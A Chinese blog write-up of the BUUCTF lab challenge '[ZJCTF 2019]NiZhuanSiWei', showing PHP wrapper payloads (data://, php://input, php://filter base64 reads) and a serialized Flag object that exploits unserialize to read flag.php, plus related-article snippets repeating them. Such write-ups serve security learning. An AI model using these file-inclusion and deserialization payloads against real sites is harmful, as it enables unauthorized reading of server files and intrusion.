[ZJCTF 2019]NiZhuanSiWei

最新推荐文章于 2022-11-13 21:19:21 发布
最新推荐文章于 2022-11-13 21:19:21 发布
阅读量392 收藏
点赞数
分类专栏: BUUCTF 文章标签: php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42812036/article/details/104317339
版权

0x00知识点

  • 远程文件包含漏洞
  • 反序列化

php:// 是一种输入输出流
具体涉及到
php://filter(本地磁盘文件进行读取)
用法:?filename=php://filter/convert.base64-encode/resource=xxx.php
?filename=php://filter/read=convert.base64-encode/resource=xxx.php 一样。

php://input:可以访问请求的原始数据的只读流
用法:?file=php://input 数据利用POST传过去。

0x01解题

在这里插入图片描述

需要让$text输入 ”welcome to the zjctf“ 传入文件中才能进行后面的步骤, 这里可以用php://input伪协议在以POST形式传入“ welcome to the zjctf " 也可以用data伪协议传参。

?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=

接着
在这里插入图片描述
直接正则过滤掉flag关键字,提示一个useless.php 用php://filter协议来读取
构造payload

?text=php://input&file=php://filter/read=convert.base64-encode/resource=useless.php
记得提交一个post数据welcome to the zjctf
在这里插入图片描述

base64解码useless.php

<?php  

class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
?>

__toString()当一个对象被当作一个字符串使用
题目的echo满足,可以触发,存在反序列化,将useless.php作为参数,写入反序列化会自动调用
payload:

?text=php://input&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

flag在F12源代码里面
在这里插入图片描述

0x03 ps

Web安全实战系列:文件包含漏洞
还有用php://input(写入木马)、php://input(命令执行)、file://伪协议 (读取文件内容)、phar://伪协议、data://(读取文件)、zip://伪协议。还要详细学下。

昂首下楼梯
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
2021-09-01[ZJCTF 2019]NiZhuanSiWei
plant1234的博客
09-07 757
[ZJCTF 2019]NiZhuanSiWei 首先根据连接打开得到一个,PHP源码: 根据源码分析,我们需要GET三个参数分别是:text,file,password 首先需要检查是否对text传一个文件,并且文件内容要是welcome to the zjctf,才能进行下一步 这里涉及到一些PHP为协议: 两个配置 PHP.ini all_url_include在php 5.2以后添加,安全方便的设置(php的默认设置)为: allow_url_fopen=on; 允许url里的封装协议访问文件
[ZJCTF 2019]NiZhuanSiWei【超详细讲解】
wo41ge的博客
11-15 3868
进入题目链接 这是源码 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'r')."</h1>
魔术方法总结
梦里不知身是客
12-26 9833
__construct(),类的构造函数 __destruct(),类的析构函数 __call(),在对象中调用一个不可访问方法时调用 __callStatic(),用静态方式中调用一个不可访问方法时调用 __get(),获得一个类的成员变量时调用 __set(),设置一个类的成员变量时调用 __isset(),当对不可访问属性调用isset()或empty()时调用 __unset(
buuctf-[ZJCTF 2019]NiZhuanSiWei
Nothing-one的博客
11-04 369
打开之后我们就可以进行php的代码审计。我们从头开始看起。 在第一个if中我们就可以看到要满足里面的等式才可以看到file_get_contents()函数的功能是读取文件内容到一个字符串,但这里没没有一个文件,而是读取的text变量。没查到相关这方面的用法,特别是那个r参数。 这里我们如果直接将text与这段话进行等值那么我们就可以看到这个网站没有回显,也就是说我们要想办法绕过这个。 用php的伪协议也就是data://伪协议来进行漏洞利用。 这里也就说明了我绕过了。 然后我们再看下一个if语句。 因为.
每天一道ctf
最新发布
whisper921的博客
11-13 777
构造:data://text/plain,welcome to the zjctf,为了绕过某些过滤,这里用到base64编码。然后有一个可控参数file,构造file=useless.php,但是针对php文件我们需要进行base64编码,否则读取不到其内容,所以构造payload:file=php://filter/read=convert.base64-encode/resource=useless.php。结果为:O:4:"Flag":1:{s:4:"file";
BUUCTF-[ZJCTF 2019]NiZhuanSiWei
lunan的博客
05-15 303
BUUCTF-[ZJCTF 2019]NiZhuanSiWei 一、知识点 1、php各种协议,data://,php:// payload构造: text=data://text/plain,welcome to the zjctf data协议解释:https://www.php.net/manual/zh/wrappers.data.php 2、文件包含 payload构造: file=php://filter/read=convert.base64-encode/resource=useless.
[ZJCTF 2019]NiZhuanSiWei(伪协议读取文件)
qq_44111753的博客
02-02 454
0x01 知识点 1、data协议用于数据流的读取 data://text/plain;base64,xxxx(base64编码后的数据) data伪协议只有在php<5.3且allow_url_fopen :on,allow_url_include:on时可以写木马。 2、php伪协议:可结合文件包含漏洞读取文件源码或执行文件 需要开启allow_url_fopen的:php://input、php://stdin、php://memory和php://temp 不需要开启allow_wrl_fo
buuctf-[ZJCTF 2019]NiZhuanSiWei 1(小宇特详解)
小宇的web博客
01-21 3073
buuctf-[ZJCTF 2019]NiZhuanSiWei 1(小宇特详解) 这里打开之后是一段源码 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".
ctf (NiZhuanSiWei)
Glacier_Mount的博客
06-27 324
这是一道简单的web题涉及data://伪协议、php伪协议和反序列化的简单应用。
NiZhuanSiWei(php伪协议)
m0_52138890的博客
09-13 451
NiZhuanSiWei 看代码,有三个参数,即text,file,password。看满足条件: text不为空,且 file_get_contents() 读取的返回值为 welcome to the zjctf,file_get_contents()函数的功能是读取文件内容到一个字符串,但这里没有一个文件,而是读取的text变量。直接给text赋值 text=welcome to the zjctf 的话,没有回显说明没成功。很明显,需要用伪协议绕过,可以用php://input和data:/
BUUCTF——[ZJCTF 2019]NiZhuanSiWei
Ho1aAs‘s Blog
05-18 243
文章目录利用点解题完 利用点 data://伪协议传php php://filter伪协议读php 反序列化unserialize() 解题 进入环境,审计代码 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
[ZJCTF 2019]NiZhuanSiWei 1
m0_62879498的博客
04-27 515
[ZJCTF 2019]NiZhuanSiWei 1 进入环境,得到源代码 观察源代码,发现: 我们需要绕过两个点 首先是 get传参 ,让text=welcome to the zjctf 在这里我们需要用到 php的伪协议 data:// data:// — 数据流读写 条件:allow_url_fopen=on;allow_url_include=on 作用:作为一个封装器对进行数据流读写 使用格式:data://text/plain,[code] eg: data://text/plain,
[ZJCTF 2019] web题-NiZhuanSiWei
BROTHERYY的博客
07-08 394
复现环境:buuoj.cn 开题源码一份 分析源码 需要将内容"welcome to the zjctf"传入到$text,才能有下一步操作 payload:/?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY= 然后是file参数,使用filter来读取useless.php,解码得源码 <?php class Flag{ //flag.php public $file; public functi

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值